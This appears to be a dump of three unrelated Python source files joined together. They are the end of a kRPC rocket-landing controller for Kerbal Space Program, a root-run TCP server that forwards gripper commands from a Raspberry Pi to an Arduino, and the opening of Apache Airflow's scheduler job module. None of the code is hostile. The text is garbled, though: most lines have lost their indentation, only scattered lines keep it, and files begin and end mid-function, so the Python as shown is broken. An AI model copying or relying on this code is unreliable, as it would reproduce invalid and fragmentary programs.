    target_direction = v3(1, 0, 0)
    vessel.control.throttle = balanced_thr * 0.25 # hold a TWR of 0.25
    if (vel[0] < -10):
        vessel.control.rcs = False
        vessel.control.pitch = -1 # pitch down
        time.sleep(1) # hold for one second
        vessel.control.pitch = 0
        vessel.control.throttle = 0
        vessel.control.rcs = True
        nav_mode = 'fall'
        print('fall')
elif nav_mode == 'fall': # falling phase: the flaps control attitude
pitch_target = clamp(ctrl_fall_distance.update((math.sqrt(error[2]**2 + error[1]**2) - params['ctrl_fall_distance_target']) / 200., game_delta_time), -1, 1) * 15 #PID
pitch_error = (flight.pitch - pitch_target) * deg2rad
hdg_target = math.atan2(-error[2], -error[1]) * rad2deg
hdg_error = norm_deg(flight.heading - hdg_target) * deg2rad
roll_error = flight.roll * deg2rad
#print(ctrl_fall_pitch.integral, math.sqrt(error[2]**2 + error[1]**2))
if (abs(pitch_error) < 0.3):
ctrl_fall_pitch.ki = params['ctrl_fall_pitch.ki']
ctrl_fall_yaw.kp = params['ctrl_fall_yaw.kp']
pitch_flap = ctrl_fall_pitch.update(pitch_error, game_delta_time) #PID
yaw_flap = ctrl_fall_yaw.update(hdg_error, game_delta_time) #PID
roll_flap = ctrl_fall_roll.update(roll_error, game_delta_time) #PID
#combine_flaps(pitch_flap, roll_flap, roll_error * rad2deg) #
combine_flaps(pitch_flap, yaw_flap)
vessel.control.yaw = yaw_flap
vessel.control.roll = roll_flap
if error[0] < params['start_altitude']: # start planning the descent trajectory
#frcount -= 1
if frcount <= 0:
frcount = 1
vessel_profile = get_vessel_profile(vessel)
vessel_state = predict_vessel_state(vessel, params['predict_altitude']) # solving takes time, so feed in an extrapolated future state
vessel_final_state = get_final_state(vessel, params['final_height'])
conn.krpc.paused = True # "ZA WARUDO" (The World): pause the game while the solver runs
#Thread(target=solve_path, args=(vessel_profile, vessel_state)).start()
solve_path(vessel_profile, vessel_state, vessel_final_state)
conn.krpc.paused = False
if (error[0] <= params['predict_altitude'] and solved_path != None):
n_i = 0
vessel.control.sas = False
vessel.control.rcs = True
nav_mode = 'convex'
retract_flaps()
print('convex')
elif nav_mode == 'convex': # follow the solved trajectory
(x, uk, tf) = solved_path
mk = x[0, :] #mass
rk = x[1:4, :] # position
vk = x[4:7, :] # vel
qk = x[7:11, :] # quaternion
wk = x[11:14, :] # omega
di = game_delta_time * K/tf
n_i = clamp(find_nearest_index(rk, vk, error), n_i + di * 0.5, n_i + di * 1.5)
#n_i = max(n_i - game_delta_time * 0.2 * K/tf, find_nearest_index(rk, vk, error)) # find the nearest trajectory index
#print(game_delta_time)
(r_i, v_i, q_i, u_i) = sample_index(n_i, rk, vk, qk, uk) # planned position/velocity at the current index
(r_i_, v_i_, q_i_, u_i_) = sample_index(n_i + 0.4 * K/tf, rk, vk, qk, uk) # sample a short time ahead
q_i_mat = rotation_mat(q_i) # rotation from the local frame to the target frame
q_i_mat_ = rotation_mat(q_i_)
u_i = transform(u_i, q_i_mat) # transform into the target frame
u_i_ = transform(u_i_, q_i_mat_)
head_i = transform(vec(1, 0, 0), q_i_mat)
head_i_ = transform(vec(1, 0, 0), q_i_mat_)
#
target_a = npl.norm(u_i) / mass * head_i + (v_i - vel) * k_v + (r_i - error) * k_x
target_a_ = npl.norm(u_i_) / mass * head_i_ + (v_i - vel) * k_v + (r_i - error) * k_x
if debug_lines: # draw the sample indicator lines
target_line.start = error
target_line.end = (r_i[0], r_i[1], r_i[2])
target2_line.start = error
target2_line.end = (r_i_[0], r_i_[1], r_i_[2])
# maximum/minimum controllable acceleration
max_throttle_ctrl = throttle_limit_ctrl[1] * (max_thrust / mass)
min_throttle_ctrl = throttle_limit_ctrl[0] * (max_thrust / mass)
# transform the target into the local frame, clamp it, then transform back
target_a = transform(target_a, q_i_mat.T)
target_a = conic_clamp(target_a, min_throttle_ctrl, max_throttle_ctrl, max_tilt_off)
target_a = transform(target_a, q_i_mat)
target_a_ = transform(target_a_, q_i_mat_.T)
target_a_ = conic_clamp(target_a_, min_throttle_ctrl, max_throttle_ctrl, max_tilt_off)
target_a_ = transform(target_a_, q_i_mat_)
# direction from the look-ahead sample, magnitude from the current one
target_direction = target_a_ / npl.norm(target_a_)
target_throttle = npl.norm(target_a) / (max_thrust / mass)
#print(target_a)
if debug_lines: # draw the target attitude line
head_line.start = error
head_line.end = error + target_direction * 20
if n_i > 0:
vessel.control.throttle = target_throttle
# if (K - n_i) * tf / K < 6: # deploy the landing gear early
# vessel.control.gear = True
if npl.norm(error[1:3]) < params['final_radius'] and npl.norm(error[0]) < params['final_height']: # entered the final landing zone
vessel.control.gear = not vessel.control.gear
[g.set_field_float('Gimbal Limit', 20) for g in engine_gimbal] # limit the gimbal to prevent oscillation
print('final')
nav_mode = 'final'
elif nav_mode == 'final':
max_acc = throttle_limit_ctrl[1] * (max_thrust / mass) - g0
max_acc_low = throttle_limit_ctrl[1] * final_throttle * (max_thrust / mass) - g0
est_h = error[0] - vel[0]**2 / (2 * max_acc) # altitude margin predicted at full control thrust
est_h_low = error[0] - vel[0]**2 / (2 * max_acc_low) # altitude margin predicted at the reduced final throttle
est_h_center = (est_h + est_h_low) / 2
# proportional feedback
vessel.control.throttle = clamp(lerp(throttle_limit_ctrl[1] * final_throttle, throttle_limit_ctrl[1], -est_h_low / (est_h - est_h_low) * (1+final_kp)), throttle_limit_ctrl[1], throttle_limit_ctrl[0])
# horizontal control
error_hor = v3(0, error[1], error[2])
vel_hor = v3(0, vel[1], vel[2])
ctrl_hor = -error_hor * params['final_hor_kp'] - vel_hor * params['final_hor_kv']
target_direction = ctrl_hor + v3(1, 0, 0)
target_direction /= npl.norm(target_direction)
target_direction = conic_clamp(target_direction, 1, 1, max_tilt)
else: # 'none': initialization
nav_mode = 'launch'
if (max_thrust == 0):
vessel.control.activate_next_stage()
vessel.control.rcs = True
vessel.control.gear = not vessel.control.gear
continue
#target_direction = -vel
#vessel.control.throttle = 0
# Transform into the body frame for attitude control; below, x/y/z refer to body axes
if nav_mode in ['final', 'convex', 'launch', 'transit']:
target_direction_local = transform(target_direction, rotation_srf2local) # target attitude direction expressed in the body frame
avel_local = transform(avel, rotation_srf2local) # angular velocity in the body frame
# maximum angular acceleration available around each of the three axes
#authority_local = (torque + torque_k * vessel.control.throttle) / moment_of_inertia_local
#authority_local = np.abs(vec(vessel.available_torque[0])) / moment_of_inertia_local
#ctrl_x_rot.unified_authority = authority_local[0]
#ctrl_z_rot.unified_authority = authority_local[2]
# PID control; roll simply damps the angular velocity
#control_pitch = -clamp(ctrl_x_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(1, 0, 0)), avel_local[0]), 1, -1)
#control_yaw = -clamp(ctrl_z_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(0, 0, 1)), avel_local[2]), 1, -1)
control_pitch = -clamp(ctrl_x_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(1, 0, 0)), game_delta_time), 1, -1)
control_yaw = -clamp(ctrl_z_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(0, 0, 1)), game_delta_time), 1, -1)
control_roll = clamp(avel_local[1] * ctrl_y_avel_kp, 1, -1)
vessel.control.pitch = control_pitch
vessel.control.yaw = control_yaw
vessel.control.roll = control_roll
# Termination condition
if nav_mode == 'final':
if (npl.norm(error[1:3]) < 3 and npl.norm(error[0]) < 1 and npl.norm(vel[1:3]) < 0.3 and npl.norm(vel[0]) < 0.5 and npl.norm(avel) < 0.2) or (vel[0] > 0 and npl.norm(error[0]) < 1):
print('exit')
vessel.control.throttle = 0
break
prev_vel = vel
game_prev_time = ut |
remoteControlThread.py | #!/usr/bin/python
import socket
import sys
import os.path
import fcntl
import struct
import serial
import threading
import time
from Gripper import Gripper
# Gripper object used by the command handlers below.
myGripper = Gripper()
# Make sure the script is run as sudo
if not os.geteuid() == 0:
sys.exit("\nOnly root can run this script\n")
udG = 0
rotG = 1
yG = 2
cG = 3
# Set up the USB connection to the Arduino. This will error
# if a USB cord is not connected.
usbOptions = ['/dev/ttyUSB0', '/dev/ttyUSB1', '/dev/ttyUSB2']
usbOptions = list(filter(os.path.exists, usbOptions))
assert(len(usbOptions) == 1)
usbPort = usbOptions[0]
mes = "Q"
num = 0
# Cute trick to get the local IP address from wlan0 (wireless)
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
# Receive the data being transmitted.
def recvall(sock, length):
    data = b''
    while len(data) < length:
        more = sock.recv(length - len(data))
        if not more:
            raise EOFError('socket closed %d bytes into a %d-byte message'
                           % (len(data), length))
        data += more
    return data
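# e.g. header = recvall(sock, 6) blocks until exactly six bytes have arrived
# (sketch; 'sock' is an already-connected socket object).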
# Set up and listen for commands.
# def myTCPServer(endSymbol):
# HOST = get_ip_address('wlan0')
# PORT = 1160
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# s.bind((HOST, PORT))
# s.listen(5)
# print "Waiting for connection. Listening to port ", str(PORT)
# client, addr = s.accept()
# print "Accepted connection from: ", addr
# while True:
# client, addr = s.accept()
# print "Accepted connection from: ", addr
# message = recvall(client, 6)
# client.close()
# if message[0] == 'S':
# client.close()
# print "Communication Closed!"
# break
# print "Message Recieved: " + message #Debug print
# # Get's the commands from the message to see if they are for the
# # gripper.
# parseMessage(message)
# usb.flush()
# usb.write(message) #Write the message recieved to the Arduino.
# usb.flush()
# Set up and listen for commands.
def myTCPServer(endSymbol):
HOST = get_ip_address('wlan0')
PORT = 1160
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(5)
print("Waiting for connection. Listening to port " + str(PORT))
client, addr = s.accept()
print("Accepted connection from: " + str(addr))
while True:
client, addr = s.accept()
print("Accepted connection from: " + str(addr))
message = []
while ':' not in message:
    message.append(client.recv(1).decode())
message = ''.join(message)
client.close()
if message[0] == 'S':
client.close()
print("Communication Closed!")
break
print("Message Received: " + message) # Debug print.
# Gets the commands from the message to see if they are for the
# gripper.
parseMessage(message)
usb.flush()
usb.write(message.encode()) # Write the received message to the Arduino.
usb.flush()
# Move Specified Gripper to Specified Angle (-180,180)
def gripperMove(servo, angle):
"""
Function containing a threading wrapper for gripperMove module of the
Gripper class.
Parameters
----------
servo : int
Servo on the gripper needing to be moved.
angle : float
Desired angle for the servo to move.
"""
thread = threading.Thread(
target=myGripper.gripperMove, args=(servo, angle))
thread.start()
def parseMessage(x):
global mes
global num
mes = x[0]
num = int(x[2:-1])
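# Example (format inferred from parseMessage and the ':'-terminated read in
# myTCPServer; the payload is hypothetical): the message "H 090:" yields
# mes = 'H' and num = 90, which tilts the up/down servo to 90 degrees.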
def gripperClose():
""" Close the mandibles. """
gripperMove(3, -180)
def gripperOpen():
""" Open the mandibles. """
gripperMove(3, 0)
def gripperAction(strInput, numInput):
if strInput == "A":
if numInput == 0:
    gripperClose()
if numInput == 1:
    gripperOpen()
elif strInput == "H":
gripperMove(udG, numInput)
elif strInput == "T":
gripperMove(yG, numInput)
elif strInput == "Y":
gripperMove(rotG, numInput)
# Open the communication thread
print("Communication Thread Started.")
communication = threading.Thread(target=myTCPServer, args=(":",))
communication.start()
# Main loop.
while True:
try:
usb = serial.Serial(usbPort, 9600, timeout=10)
# serial.Serial opens the port on construction, so no explicit open() call is needed.
# Put the gripper in the initial configuration defined in Gripper
# class.
myGripper.gripperInitial()
time.sleep(2) # give the serial time to get opened
print("USB Connection Initialized.")
except serial.SerialException:
myGripper.allOff() # Turns off all the gripper servos.
os.system("sudo killall servod") # Kills the servod program.
temp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
temp.connect((get_ip_address('wlan0'), 1160))
temp.sendall(b"S:")
temp.close()
sys.exit("USB connection not found (Is the USB cord plugged in?)")
while True:
try:
gripperAction(mes, num)
print("Command: " + mes + " Number: " + str(num))
time.sleep(0.1) # Thread can execute too fast for communication?
except KeyboardInterrupt:
myGripper.allOff() # Turns off all the gripper servos.
os.system("sudo killall servod") # Kills the servod program.
temp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
temp.connect((get_ip_address('wlan0'), 1160))
temp.sendall(b"S:")
temp.close()
sys.exit("Successfully Exited Main Loop")
# End script if inner while loop ends.
break
|
scheduler_job.py | # pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_, tuple_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, SerializedDagNotFound, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.event_scheduler import EventScheduler
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.retries import MAX_DB_RETRIES, retry_db_transaction, run_with_db_retries
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given file.
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
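# A minimal usage sketch of this wrapper (the DAG file path is hypothetical;
# in Airflow this class is normally driven by the DAG file processing manager):
#
#   processor = DagFileProcessorProcess(
#       file_path="/dags/example_dag.py", pickle_dags=False,
#       dag_ids=None, callback_requests=[])
#   processor.start()
#   while not processor.done:
#       time.sleep(0.1)
#   dags_found, import_errors = processor.result or (0, 0)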
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to DagFileProcessor.process_file
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
Returns a tuple of 'number of dags found' and 'the count of import errors'
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Find all tasks that have SLAs defined, and send alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
self.log.info("Running SLA Checks for %s", dag.dag_id)
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
max_tis: List[TI] = (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
)
.all()
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if task.sla and not isinstance(task.sla, timedelta):
raise TypeError(
f"SLA is expected to be timedelta object, got "
f"{type(task.sla)} in {task.dag_id}:{task.task_id}"
)
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(
SlaMiss(task_id=ti.task_id, dag_id=ti.dag_id, execution_date=dttm, timestamp=ts)
)
dttm = dag.following_schedule(dttm)
session.commit()
# pylint: disable=singleton-comparison
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
# pylint: enable=singleton-comparison
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join(sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas)
blocking_task_list = "\n".join(
ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n</code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}</code></pre>
Airflow Webserver URL: {conf.get(section='webserver', key='base_url')}
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(errors.ImportError.filename == dagbag_file).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
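# Illustrative call (session and dagbag are hypothetical here):
#     DagFileProcessor.update_import_errors(session=session, dagbag=dagbag)
# Because errors for every processed file are deleted before the current
# errors are re-inserted, the import_error table always reflects only the
# most recent parse of each file.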
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = None
) -> None:
"""
Execute on-failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
self.log.debug("Processing Callback Request: %s", request)
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
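# Dispatch summary for the loop above: TaskCallbackRequest -> task failure
# handling, SlaCallbackRequest -> manage_slas, DagCallbackRequest -> DAG-level
# success/failure callback; any other request type falls through untouched.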
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure_with_callback(error=request.msg, test_mode=ti.test_mode)
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to this method.
3. Serialize the DAGs and save them to the DB (or update the existing records).
4. Pickle the DAGs and save them to the DB (if necessary).
5. Record any errors importing the file into the ORM
